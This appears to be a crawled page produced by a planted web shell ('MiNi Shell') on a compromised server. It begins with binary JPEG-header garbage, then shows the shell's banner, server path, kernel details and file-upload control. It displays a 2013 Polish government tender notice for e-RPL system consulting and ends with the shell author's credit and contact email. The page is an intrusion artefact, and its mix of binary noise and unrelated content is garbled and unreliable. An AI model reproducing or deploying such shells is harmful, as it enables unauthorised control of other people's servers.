JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130419/156070-N-2013.html

<p class="kh_header"><b>Warszawa: Usługa doradztwa przy realizacji projektu: Utworzenie i wdrożenie  Systemu  e-RPL</b><br>
<b>Numer ogłoszenia: 156070 - 2013; data zamieszczenia: 19.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rządowe Centrum Legislacji , Al. J. Ch. Szucha 2/4, 00-582 Warszawa, woj. mazowieckie, tel. 22 6947521, faks 22 6947015.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rcl.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa doradztwa przy realizacji projektu: Utworzenie i wdrożenie  Systemu  e-RPL.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług polegających na: pełnieniu funkcji konsultacyjnych i doradczych o charakterze eksperckim, udzielaniu wsparcia merytorycznego i realizacji prac  w zakresie planowania i organizacji projektu, prowadzeniu analiz i audytów oraz zaprojektowaniu architektury rozwiązania i przygotowaniu jego dokumentacji, a następnie stała analiza jakości, terminowości i zgodności z planami realizacji przedsięwzięcia budowy Systemu e-RPL.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.22.00.00-3, 72.22.10.00-0, 72.22.40.00-1, 72.15.00.00-1, 79.41.10.00-8, 79.41.52.00-8, 79.21.20.00-3, 72.24.60.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 9.000,00 zł (słownie: dziewięć tysięcy złotych) od Wykonawców zaproszonych do złożenia oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (w przypadku świadczeń okresowych lub ciągłych uwzględnione są również nadal wykonywane zamówienia) należycie wykonał co najmniej 2 zamówienia o wartości co najmniej 200 tys. zł brutto każde z zamówień, polegające na usłudze doradczej o charakterze eksperckim oraz na udzielaniu wsparcia w zakresie organizacji, realizacji i wdrożeniu projektu o charakterze informatycznym, gdzie każde z zamówień dotyczyło a) wsparcia technicznego i doradztwa dla projektu polegającego na budowie systemu informatycznego, o wartości co najmniej 0,5 mln zł brutto b) realizacji zadania gromadzenia, wymiany i uzgadniania dokumentów elektronicznych dla organizacji rozproszonej w co najmniej 10 lokalizacjach, umożliwiającej równoczesną pracę co najmniej 200 użytkowników we wszystkich lokalizacjach c) usług doradczych i konsultacji przy wdrożeniu ww. systemu informatycznego realizowanego przez podmiot trzeci d) do każdego z zamówień Wykonawca wykorzystywał jako narzędzie metodykę zarządzania projektami uznawaną na arenie międzynarodowej klasy PMI, TenSteps, PRINCE 2, lub inną równoważną metodykę e) do oceny każdego z zamówień dla poprawności szacowania wartości prac wykorzystywał narzędzia szacowania i oceny kosztów budowy systemu informatycznego w oparciu o Metodę Punktów Funkcyjnych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, iż dysponuje lub będzie dysponował co najmniej:
1. Jedną osobą, która będzie kierownikiem projektu, posiadającą:
a)wykształcenie wyższe;
b)7 lat doświadczenia w obszarze technologii informatycznych i komunikacyjnych (TIK);
c)doświadczenie polegające na pełnieniu funkcji kierownika projektu w co najmniej 3 projektach o wartości co najmniej 0,5 mln zł brutto każdy z projektów, których zakres dotyczył budowy i utrzymaniu systemu informatycznego;
d)doświadczenie polegające na pełnieniu funkcji kierownika projektu w co najmniej 2 projektach, o wartości co najmniej 0,5 mln zł brutto każdy z projektów, których zakres dotyczył doradztwa przy budowie i utrzymania systemu informatycznego.
2. Jedną osobą, która będzie pełnić funkcję architekta systemu, posiadającą:
a) wykształcenie wyższe w zakresie technologii informatycznych i komunikacyjnych lub zarządzania;
b) 3 lata doświadczenia w obszarze technologii informatycznych i komunikacyjnych (TIK);
c) doświadczenie polegające na pełnieniu funkcji architekta systemu informatycznego w co najmniej 3 projektach o wartości co najmniej 0,5 mln zł brutto każdy z projektów, których przedmiotem była budowa i utrzymanie systemu informatycznego;
d) doświadczenie polegające na pełnieniu funkcji architekta systemu informatycznego w co najmniej 3 projektach o wartości co najmniej 0,5 mln zł brutto każdy z projektów, których przedmiotem było doradztwo przy budowie i utrzymaniu systemów informatycznych;
e) doświadczenie polegające na udziale w co najmniej 1 projekcie o wartości co najmniej 0,5 mln zł brutto w zakresie tworzenia i integracji oprogramowania;
f) doświadczenie polegające na udziale w co najmniej 2 projektach o wartości co najmniej 0,5 mln zł brutto każdy z projektów z zakresu rozległych rozwiązań sieciowych ze szczególnym uwzględnieniem wdrożenia aplikacji, w tym rozwiązań wirtualnych aplikacji jako serwisów (AaaS).
3.Jedną osobą, która będzie pełnić funkcję eksperta ds. zarządzania Biurem Projektów (PMO - Project Management Office), posiadającą:
a) wykształcenie wyższe;
b) doświadczenie polegające na prowadzeniu biura projektu w co najmniej 3 projektach o wartości 200 tys. zł brutto każdy z projektów w zakresie technologii informatycznych i komunikacyjnych (TIK),
c) doświadczenie polegające na prowadzeniu biura projektu w co najmniej 1 projekcie o wartości 200 tys. zł brutto, który był/jest finansowany  lub dofinansowany ze środków pochodzących z budżetu Unii Europejskiej lub niepodlegających zwrotowi środków pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA);
d) wiedzę w zakresie zarządzania projektami w metodyce uznawanej na arenie międzynarodowej klasy PMI, TenSteps, PRINCE 2, lub innej równoważnej. 
4. Jedną osobą, która będzie pełnić funkcję eksperta ds. budowy systemów informatycznych, posiadającą:
a) wykształcenie wyższe;
b) doświadczenie polegające na pełnieniu funkcji osoby odpowiedzialnej za analizę wymagań użytkowników i procesów na potrzeby rozwiązań systemów informatycznych, w realizacji co najmniej 2 projektów o wartości 0,5 mln zł brutto każdy z projektów, których przedmiotem było wsparcie w przygotowaniu postępowania o udzielenie zamówienia publicznego zgodnie z przepisami o zamówieniach publicznych na budowę, utrzymanie i rozwój systemu informatycznego;
c) doświadczenie polegające na przygotowaniu opisu przedmiotu zamówienia w co najmniej 2 projektach o wartości 0,5 mln każdy z projektów, realizowanych zgodnie  z przepisami o zamówieniach publicznych w zakresie budowy i integracji systemów informatycznych;
d) wiedzę w zakresie zarządzania projektami w metodyce uznawanej na arenie międzynarodowej klasy PMI, TenSteps, PRINCE 2, lub innej równoważnej;
e) kwalifikacje w zakresie zarządzania usługami informatycznymi zgodnie z zaleceniami biblioteki ITIL lub równoważnymi.
5. Jedną osobą, która będzie pełnić funkcję eksperta ds. zarządzania wymaganiami i testowaniem, posiadającą:
a) wykształcenie wyższe techniczne;
b) doświadczenie polegające na doradztwie oraz tworzeniu wymagań m.in. dla testów odbiorczych w co najmniej 3 projektach o wartości co najmniej 0,5 mln zł brutto każdy z projektów, w zakresie budowy systemów z obszaru technologii informatycznych i komunikacyjnych (TIK);
c) wiedzę i znajomość metodyki testowania na poziomie odpowiadającym certyfikatowi ISTQB lub równoważnemu;
d) kwalifikacje w zakresie zarządzania wymaganiami REQB lub inne równoważne. 
6. Jedną osobą, która będzie pełnić funkcję eksperta ds. prawnych, posiadającą:
a) prawo do wykonywania zawodu radcy prawnego lub adwokata;
b) doświadczenie polegające na obsłudze prawnej co najmniej 2 projektów o wartości 1 mln każdy z projektów, z obszaru technologii informatycznych i komunikacyjnych (TIK);
c) doświadczenie polegające na konstruowaniu umów, oceny zagrożeń i ryzyk w tym ryzyk prawnych w co najmniej 2 projektach doradczych z obszaru technologii informatycznych i komunikacyjnych (TIK) o wartości 100 tys. zł brutto każdy z projektów;
d) doświadczenie polegające na opiniowaniu co najmniej 3 opisów przedmiotu zamówienia na budowę systemów informatycznych , pod względem zgodności tych opisów z przepisami o zamówieniach publicznych,  o wartości co najmniej 0,5 mln zł brutto każdy z systemów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, na kwotę co najmniej 150.000,00 zł (słownie: sto pięćdzisiąt tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>1. Zamawiający oceni wykazane przez Wykonawcę doświadczenie na podstawie punktów przyznanych za każde wykonane zamówienie odpowiadające wymaganiom Zamawiającego zgodnie z sekcją III.3.2) niniejszego ogłoszenia o zamówieniu według następującej zasady: Za każde wykazane ponad wymagane zamówienia, Wykonawca otrzyma 5 pkt, jednak nie więcej niż 20 pkt.
2.Zamawiający oceni wykazane przez Wykonawcę doświadczenie osób skierowanych do wykonywania zamówienia na podstawie punktów przyznanych za każde wykonane zamówienie odpowiadające wymaganiom Zamawiającego zgodnie z sekcją III.3.4) niniejszego ogłoszenia o zamówieniu według następujących zasad:
2.1.Za doświadczenie wymagane zgodnie sekcją III.3.4) pkt 1. ppkt c) - 6 pkt za każde zamówienie powyżej wymaganego minimum, maksymalna ilość pkt do uzyskania 24;
2.2.Za doświadczenie wymagane zgodnie sekcją III.3.4) pkt 1. ppkt d)  - 6 pkt za każde zamówienie powyżej wymaganego minimum, maksymalna ilość pkt do uzyskania 24;
2.3.Za doświadczenie wymagane zgodnie sekcją III.3.4) pkt 2 ppkt c)  - 4 pkt za każde zamówienie powyżej wymaganego minimum, maksymalna ilość pkt do uzyskania 16;  
2.4.Za doświadczenie wymagane zgodnie sekcją III.3.4) pkt 2 ppkt d)  - 4 pkt za każde zamówienie powyżej wymaganego mimimum, maksymalna ilość pkt do uzyskania 16;
2.5.Za doświadczenie wymagane zgodnie sekcją III.3.4) pkt 2 ppkt e) - 4 pkt za każde zamówienie powyżej wymaganego minimum, maksymalna ilość pkt do uzyskania 16;
2.6.Za doświadczenie wymagane zgodnie sekcją III.3.4) pkt 2 ppkt f) - 4 pkt za każde zamówienie powyżej wymaganego minimum, maksymalna ilość pkt do uzyskania 16;
2.7.Za doświadczenie wymagane zgodnie sekcją III.3.4) pkt 3 ppkt b)  - 3 pkt za każde zamówienie powyżej wymaganego minimum, maksymalna ilość pkt do uzyskania 15;
2.8.Za doświadczenie wymagane zgodnie sekcją III.3.4) pkt 3 ppkt c)  - 3 pkt za każde zamówienie powyżej wymaganego minimum, maksymalna ilość pkt do uzyskania 15;
2.9.Za doświadczenie wymagane zgodnie sekcją III.3.4) pkt 4 ppkt b) - 5 pkt za każde zamówienie powyżej wymaganego minimum, maksymalna ilość pkt do uzyskania 20;
2.10.Za doświadczenie wymagane zgodnie sekcją III.3.4) pkt 4 ppkt c)  - 5 pkt za każde zamówienie powyżej wymaganego minimum, maksymalna ilość pkt do uzyskania 20;
2.11.Za doświadczenie wymagane zgodnie sekcją III.3.4) pkt 5 ppkt b) 4 pkt za każde zamówienie powyżej wymaganego minimum, maksymalna ilość pkt do uzyskania 20;
2.12.  Za doświadczenie wymagane zgodnie sekcją III.3.4) pkt 6 ppkt b)  4 pkt za każde zamówienie powyżej wymaganego minimum, maksymalna ilość pkt do uzyskania 16;
2.13. Za doświadczenie wymagane zgodnie sekcją III.3.4) pkt 6 ppkt c)  4 pkt za każde zamówienie powyżej wymaganego minimum, maksymalna ilość pkt do uzyskania 16;
2.14. Za doświadczenie wymagane zgodnie sekcją III.3.4) pkt 6 ppkt d)  4 pkt za każde zamówienie powyżej wymaganego minimum, maksymalna ilość pkt do uzyskania 16.
Zamawiający dokona zsumowania punktów przyznanych poszczególnym Wykonawcom.
Jeżeli Wykonawca wskaże więcej niż jedną osobę do realizacji zamówienia w każdej z przewidzianych funkcji, Zamawiający przyzna punkty tylko tej osobie, która uzyska największą ilość punktów. Osoba ta będzie brała udział w realizacji zamówienia.
Zamawiający zaprosi do składania ofert 5 Wykonawców, którzy uzyskają największą zsumowaną ilość punktów.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Sposób realizacji zamówienia - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 § 1 ustawy -Prawo zamówień Publicznych, dopuszcza się możliwość zmiany umowy w stosunku do treści oferty Wykonawcy 
m.in. w zakresie terminów realizacji etapów/zamówienia, terminów płatności, zmian osób wyznaczonych do realizacji zamówienia, zmian sposobu realizacji zamówienia, miejsca realizacji zamówienia, zmniejszenia lub zwiększenia zakresu realizacji zamówienia w przypadkach gdy:
a) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Umowy,
b) wynikną rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony,
c) nastąpi zmiana stawki podatku VAT, wynagrodzenie brutto Wykonawcy pozostaje na dotychczasowym poziomie, zaś zmianie ulega jedynie proporcja pomiędzy wartością netto a wartością brutto umowy,
d) potrzeba takiej zmiany będzie następstwem zmiany zasad finansowania zamówienia przez Zamawiającego lub zmian zmiany przepisów prawa,
e) wystąpią przyczyny obiektywne niezależne od Wykonawcy lub od Zamawiającego, a uniemożliwiające wykonanie przedmiotu umowy w ustalonym terminie lub zakresie, 
f) nastąpi przekształcenie podmiotowe Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> SIWZ zostanie przekazany Wykonawcom dopuszczonym do udziału w postępowaniu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ zostanie przekazany Wykonawcom dopuszczonym do udziału w postępowaniu wraz z zaproszeniem do składania ofert.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2013 godzina 12:00, miejsce: Rządowe Centrum Legislacji
Al. J. Ch. Szucha 2/4
00-582 Warszawa,
Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane jest ze środków pochodzących z projektu pn. 
Doskonalenie technik legislacyjnych w urzędach obsługujących organy władzy publicznej realizowanego w ramach Europejskiego Funduszu Społecznego -  Program Operacyjny Kapitał Ludzki.
Ogólna koncepcja realizacji przedsięwzięcia dostępna jest na stronie Zamawiającego www.rcl.gov.pl 
Wzór wniosku o dopuszczenie do udziału w postępowaniu wraz z załącznikami, dostępny jest na stronie Zamawiającego www.rcl.gov.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com